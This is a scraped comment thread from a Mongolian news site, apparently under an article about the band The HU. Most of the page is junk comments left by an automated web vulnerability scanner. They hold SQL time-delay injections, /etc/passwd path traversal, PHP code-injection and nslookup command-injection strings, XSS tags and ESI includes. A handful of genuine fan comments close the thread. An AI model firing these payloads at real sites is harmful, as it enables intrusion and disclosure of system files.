'" [116.113.93.82] 2020-10-28 17:21:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:57

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:57

1 waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:57

<!--

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 17:21:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:56

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:56

-1); waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:55

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [acu1810<s1﹥s2ʺs3ʹuca1810] 2020-10-28 17:21:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:55

-1; waitfor delay '0:0:6' --

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 17:21:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:54

../../../../../../../../../../etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:54

'"

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:53

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

GRLpGpAG [116.113.93.829680367] 2020-10-28 17:21:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:52

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:52

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 17:21:52

1

GRLpGpAG ['"()&%<acx><ScRiPt >y4yw(9612)</ScRiPt>] 2020-10-28 17:21:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:50

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:49

if(now()=sysdate(),sleep(9),0)

GRLpGpAG [<!--] 2020-10-28 17:21:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:49

../../../../../../../../../../../../../../../proc/version

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 17:21:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:49

-1" OR 2+500-500-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:48

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >y4yw(9149)</ScRiPt>] 2020-10-28 17:21:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:47

${@print(md5(acunetix_wvs_security_test))}\

GRLpGpAG ['"] 2020-10-28 17:21:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:47

-1' OR 2+918-918-1=0+0+0+1 or 'HG4bfaye'='

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:46

${@print(md5(acunetix_wvs_security_test))}

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:46

-1' OR 2+774-774-1=0+0+0+1 --

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 17:21:46

1

create/. [116.113.93.82] 2020-10-28 17:21:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:44

-1 OR 2+511-511-1=0+0+0+1

/www.vulnweb.com [116.113.93.82] 2020-10-28 17:21:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:43

-1 OR 2+346-346-1=0+0+0+1 --

create [116.113.93.82] 2020-10-28 17:21:43

1

testasp.vulnweb.com [116.113.93.82] 2020-10-28 17:21:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:42

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:42

/www.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:42

";print(md5(acunetix_wvs_security_test));$a="

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:42

GuStuVNq

create [116.113.93.82] 2020-10-28 17:21:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:41

';print(md5(acunetix_wvs_security_test));$a='

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 17:21:41

1

GRLpGpAG [] 2020-10-28 17:21:41

1

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 17:21:40

1

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 17:21:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:39

;print(md5(acunetix_wvs_security_test));

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:39

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 17:21:39

1

GRLpGpAG [] 2020-10-28 17:21:39

1

GRLpGpAG [/www.vulnweb.com] 2020-10-28 17:21:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:37

1

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 17:21:36

1

GRLpGpAG [JyI=] 2020-10-28 17:21:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:36

testasp.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:36

create/.

http://hitkjl4xqh0yL.bxss.me/ [116.113.93.82] 2020-10-28 17:21:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:35

create

GRLpGpAG [@@fewlq] 2020-10-28 17:21:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:34

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [1] 2020-10-28 17:21:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:33

create

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:33

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:32

http://hitICPwIl7lma.bxss.me/

GRLpGpAG [\] 2020-10-28 17:21:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:32

1some_inexistent_file_with_long_name.jpg

GRLpGpAG [1'"] 2020-10-28 17:21:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:28

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 17:21:28

1

GRLpGpAG [http://hitUCDh659nYS.bxss.me/] 2020-10-28 17:21:26

1

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 17:21:26

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 17:21:26

1

GRLpGpAG [create/.] 2020-10-28 17:21:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:24

testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [create] 2020-10-28 17:21:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:23

HttP://testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [create] 2020-10-28 17:21:22

1

Array [116.113.93.82] 2020-10-28 17:21:22

1

Array [116.113.93.82] 2020-10-28 17:21:21

1

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 17:21:20

1

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 17:21:19

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 17:21:19

1

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 17:21:17

1

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 17:21:17

1

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 17:21:17

1

Зочин [116.113.93.82] 2020-10-28 17:21:16

1

'"() [116.113.93.82] 2020-10-28 17:21:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:15

Array

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 17:21:15

1

Array [116.113.93.82] 2020-10-28 17:21:14

1

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 17:21:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:14

Array

!(()&&!|*|*| [116.113.93.82] 2020-10-28 17:21:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:12

12345'"\'\");|]*{ <>

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 17:21:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:11

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:11

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:11

'"()

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 17:21:11

1

) [116.113.93.82] 2020-10-28 17:21:11

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 17:21:10

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 17:21:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:10

Array

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:10

^(#$!@#$)(()))******

GRLpGpAG [file:///etc/passwd] 2020-10-28 17:21:10

1

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 17:21:09

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 17:21:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:08

!(()&&!|*|*|

GRLpGpAG [..] 2020-10-28 17:21:08

1

GRLpGpAG [Ah16f6ec'));select pg_sleep(6); -- ] 2020-10-28 17:21:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:07

)

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 17:21:07

1

GRLpGpAG [F0qnsWDb');select pg_sleep(6); -- ] 2020-10-28 17:21:07

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 17:21:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:07

1

GRLpGpAG ['"()] 2020-10-28 17:21:05

1

GRLpGpAG [IYB3W47t';select pg_sleep(6); -- ] 2020-10-28 17:21:05

1

GRLpGpAG&n970791=v987837 [116.113.93.82] 2020-10-28 17:21:05

1

GRLpGpAG [Array] 2020-10-28 17:21:04

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 17:21:04

1

UGxNa1FuMG0= [116.113.93.82] 2020-10-28 17:21:03

1

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 17:21:03

1

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 17:21:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:03

1&n904220=v968859

GRLpGpAG [Array] 2020-10-28 17:21:03

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 17:21:03

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 17:21:02

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 17:21:02

1

GRLpGpAG [Array] 2020-10-28 17:21:02

1

GRLpGpAG [cMMnYYCj'; waitfor delay '0:0:9' -- ] 2020-10-28 17:21:02

1

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 17:21:01

1

GRLpGpAG [)] 2020-10-28 17:21:01

1

GRLpGpAG [/etc/passwd] 2020-10-28 17:21:01

1

GRLpGpAG [116.113.93.82&n968934=v949899] 2020-10-28 17:21:00

1

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 17:21:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:59

1

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 17:20:59

1

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 17:20:58

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 17:20:58

1

${9999309+9999354} [116.113.93.82] 2020-10-28 17:20:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:56

${9999811+10000150}

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 17:20:56

1

GRLpGpAG [1 waitfor delay '0:0:9' -- ] 2020-10-28 17:20:56

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 17:20:56

1

GRLpGpAG [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 17:20:55

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 17:20:55

1

GRLpGpAG [${9999265+10000249}] 2020-10-28 17:20:54

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 17:20:54

1

&nslookup YncjDKAq&'\"`0&nslookup YncjDKAq&`' [116.113.93.82] 2020-10-28 17:20:54

1

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 17:20:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:54

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

$(nslookup UEe8YKsT) [116.113.93.82] 2020-10-28 17:20:53

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z] 2020-10-28 17:20:53

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 17:20:52

1

set|set&set [116.113.93.82] 2020-10-28 17:20:52

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 17:20:51

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 17:20:51

1

GRLpGpAG [] 2020-10-28 17:20:51

1

EDncNXu5 [116.113.93.82] 2020-10-28 17:20:51

1

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 17:20:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:50

d50XH0l0

GRLpGpAG [6biX29Yq] 2020-10-28 17:20:48

1

"+response.write(9254426*9097697)+" [116.113.93.82] 2020-10-28 17:20:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:47

&nslookup WDpLN3BA&'\"`0&nslookup WDpLN3BA&`'

'+response.write(9254426*9097697)+' [116.113.93.82] 2020-10-28 17:20:47

1

GRLpGpAG [if(now()=sysdate(),sleep(9),0)] 2020-10-28 17:20:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:46

$(nslookup ORnBRBWp)

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:45

set|set&set

response.write(9254426*9097697) [116.113.93.82] 2020-10-28 17:20:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:43

"+response.write(9440804*9008059)+"

GRLpGpAG [-1" OR 2+848-848-1=0+0+0+1 -- ] 2020-10-28 17:20:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:40

'+response.write(9440804*9008059)+'

GRLpGpAG [&nslookup KXyN04w5&'\"`0&nslookup KXyN04w5&`'] 2020-10-28 17:20:40

1

GRLpGpAG [-1' OR 2+847-847-1=0+0+0+1 or 'dB87mshw'='] 2020-10-28 17:20:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:39

response.write(9440804*9008059)

GRLpGpAG [$(nslookup cJoe5exe)] 2020-10-28 17:20:39

1

GRLpGpAG [-1' OR 2+955-955-1=0+0+0+1 -- ] 2020-10-28 17:20:38

1

GRLpGpAG [-1 OR 2+726-726-1=0+0+0+1] 2020-10-28 17:20:36

1

GRLpGpAG [set|set&set] 2020-10-28 17:20:36

1

GRLpGpAG [-1 OR 2+881-881-1=0+0+0+1 -- ] 2020-10-28 17:20:34

1

GRLpGpAG [8xwN6UVO] 2020-10-28 17:20:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:20:29

1

GRLpGpAG ["+response.write(9562924*9717306)+"] 2020-10-28 17:20:27

1

GRLpGpAG ['+response.write(9562924*9717306)+'] 2020-10-28 17:20:26

1

GRLpGpAG [response.write(9562924*9717306)] 2020-10-28 17:20:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:02:42

1

ZAP [134.122.22.13] 2020-03-29 16:11:04

ZAP [134.122.22.13] 2020-03-29 16:11:03

Зочин [64.119.19.194] 2020-01-22 14:47:10

Mongoldoo. Yum. Khiij. Bvteej unch. Chadakhgvi. khoino ingeed l bakhiraldaad bandar Bariad tenet yabakhaas. yakab

Зочин [202.55.188.42] 2020-01-20 07:05:20

Монголчууд бид Эвтэй байхдаа хүчтэй.

зочин [122.201.23.84] 2020-01-20 02:05:58

Одоо үнэн доргио жинхэнэ рок шинэ уран бүтээл хийх хэрэгтэй байна

иргэн [202.179.25.80] 2020-01-20 01:22:54

Өвөрмөц тоглолт, зохиомж, дуу хоолойтой ХҮ хамтлагтай үнэхээр гайхалтай. ХҮ-гийн амжилтаар үнэхээр бахархаж байна. Дэлхий хүлээн зөвшөөрч байна. хэдэн зун сая, түүгээр ч барахгүй тэр бум гаруйгаар тоологдох хүн амтай улс гүрнүүдээс ХҮ шиг хамтлаг төрөөгүй байхад шүү. Ёстой мундаг.

Зочин [202.9.47.9] 2020-01-19 11:19:56

Нөгөө хачин аятай үгтэй ганц дуугаа дуулах уу.

Зочин [202.55.188.42] 2020-01-20 07:03:02

Өөдлөж яваа нэгнийгээ битгий гутаа.

Зочин [202.9.46.40] 2020-01-19 11:28:18

чи ганц дуугий нь л сонссон юм байна урын сан ихтэй шүү хачин аятай гэхийг бодоход монгол биш хужаа хүн байхнээ монгол хүн бол сонсоход огшдог эрчим энергитэй дуунуудтай шүү

Зочин [202.9.46.40] 2020-01-19 09:02:16

залуусынхаа төлөө залбирнаа бахархалтай шүү та нар минь

Eh oron [202.126.89.250] 2020-01-19 08:36:15

Tiimee bid mongolchuud golon ebtei nairtai hvn channaraa aldahgvi ybah heregtei shvv mongol ahan dvvs mini hv hv hv hv hamtalgiin deer mongoliin monh hoh tenger vrgelj zelmeg baig

Зочин [64.119.17.250] 2020-01-19 08:27:00

Дэлхийн тавцанд гарч эхэлж байна даа.Залуустаа амжилт.Hu Hu Hu

zochin [202.126.89.173] 2020-01-19 04:12:09

Yamar mundag yum be baharhaj bn amjilt husiye.


1477 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
1477 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.